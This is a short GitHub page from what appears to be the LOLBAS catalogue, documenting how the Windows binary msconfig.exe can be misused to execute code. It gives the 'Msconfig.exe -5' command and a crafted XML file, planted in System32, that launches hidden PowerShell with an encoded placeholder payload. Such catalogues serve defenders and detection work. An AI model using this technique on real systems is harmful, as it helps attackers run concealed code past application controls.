Skip to content

Latest commit

 

History

History
33 lines (23 loc) · 559 Bytes

Msconfig.md

File metadata and controls

33 lines (23 loc) · 559 Bytes

Msconfig.exe

  • Functions: Execute
Msconfig.exe -5  
 

Acknowledgements:

  • Pierre-Alexandre Braeken - @pabraeken

Resources:

Full path:

c:\windows\system32\msconfig.exe

Notes:

  • Prerequisites add a crafted .xml in System32
<?xml version="1.0" ?> 
<MSCONFIGTOOLS> 
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" 
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> 
</MSCONFIGTOOLS>